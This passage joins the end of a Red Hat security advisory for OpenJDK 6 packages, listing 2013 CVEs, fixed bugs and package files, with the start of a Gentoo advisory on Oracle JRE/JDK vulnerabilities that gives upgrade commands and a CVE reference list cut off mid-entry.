Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit. \n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine. \n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions. \n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341)\n1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081)\n1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675)\n1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299)\n1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071)\n1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277)\n1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071)\n1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349)\n1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505)\n1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102)\n1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093)\n1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291)\n1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510)\n1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287)\n1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157)\n1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739)\n1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987)\n1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196)\n1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425)\n1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653)\n1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029)\n1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744)\n1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530)\n1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290)\n1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743)\n1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-3829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4002.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5772.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5774.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5778.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5780.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5782.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5783.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5784.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5790.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5797.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5802.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5803.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5804.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5809.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5814.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5817.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5820.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5823.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5825.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5829.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5830.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5840.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5842.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5849.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5850.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFSeT/AXlSAg2UNWIIRAvBKAJ9vGve+1MyOR8lyLQffhBtOlcmxrgCfVKad\nebAHvPvYFmwsG11PQeLu+bI=\n=+ckf\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201401-30\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: January 27, 2014\n Bugs: #404071, #421073, #433094, #438706, #451206, #455174,\n #458444, #460360, #466212, #473830, #473980, #488210, #498148\n ID: 201401-30\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the Oracle JRE/JDK,\nallowing attackers to cause unspecified impact. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/sun-jdk \u003c= 1.6.0.45 Vulnerable!\n 2 dev-java/oracle-jdk-bin \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n 3 dev-java/sun-jre-bin \u003c= 1.6.0.45 Vulnerable!\n 4 dev-java/oracle-jre-bin \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n 5 app-emulation/emul-linux-x86-java\n \u003c 1.7.0.51 \u003e= 1.7.0.51 *\n -------------------------------------------------------------------\n NOTE: Certain packages are still vulnerable. Users should migrate\n to another package if one is available or wait for the\n existing packages to be marked stable by their\n architecture maintainers. \n -------------------------------------------------------------------\n NOTE: Packages marked with asterisks require manual intervention!\n -------------------------------------------------------------------\n 5 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been reported in the Oracle Java\nimplementation. Please review the CVE identifiers referenced below for\ndetails. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.51\"\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.51\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.51\"\n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one\nof the newer Oracle packages like dev-java/oracle-jdk-bin or\ndev-java/oracle-jre-bin or choose another alternative we provide; eg. \nthe IBM JDK/JRE or the open source IcedTea. \n\nReferences\n==========\n\n[ 1 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 2 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 3 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 4 ] CVE-2012-0498\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498\n[ 5 ] CVE-2012-0499\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499\n[ 6 ] CVE-2012-0500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500\n[ 7 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 8 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 9 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 10 ] CVE-2012-0504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504\n[ 11 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 12 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 13 ] CVE-2012-0507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507\n[ 14 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 15 ] CVE-2012-1531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531\n[ 16 ] CVE-2012-1532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532\n[ 17 ] CVE-2012-1533\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533\n[ 18 ] CVE-2012-1541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541\n[ 19 ] CVE-2012-1682\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682\n[ 20 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 21 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 22 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 23 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 24 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 25 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 26 ] CVE-2012-1721\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721\n[ 27 ] CVE-2012-1722\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722\n[ 28 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 29 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 30 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 31 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 32 ] CVE-2012-3136\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136\n[ 33 ] CVE-2012-3143\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143\n[ 34 ] CVE-2012-3159\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159\n[ 35 ] CVE-2012-3174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174\n[ 36 ] CVE-2012-3213\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213\n[ 37 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 38 ] CVE-2012-3342\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342\n[ 39 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 40 ] CVE-2012-4681\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681\n[ 41 ] CVE-2012-5067\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067\n[ 42 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 43 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 44 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 45 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 46 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 47 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 48 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 49 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 50 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 51 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 52 ] CVE-2012-5079\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079\n[ 53 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 54 ] CVE-2012-5083\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083\n[ 55 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 56 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 57 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 58 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 59 ] CVE-2012-5088\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088\n[ 60 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 61 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 62 ] CVE-2013-0351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351\n[ 63 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 64 ] CVE-2013-0402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402\n[ 65 ] CVE-2013-0409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409\n[ 66 ] CVE-2013-0419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419\n[ 67 ] CVE-2013-0422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422\n[ 68 ] CVE-2013-0423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423\n[ 69 ] CVE-2013-0430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430\n[ 70 ] CVE-2013-0437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437\n[ 71 ] CVE-2013-0438\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438\n[ 72 ] CVE-2013-0445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445\n[ 73 ] CVE-2013-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446\n[ 74 ] CVE-2013-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448\n[ 75 ] CVE-2013-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449\n[ 76 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 77 ] CVE-2013-1473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473\n[ 78 ] CVE-2013-1479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479\n[ 79 ] CVE-2013-1481\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481\n[ 80 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 81 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 82 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 83 ] CVE-2013-1487\n 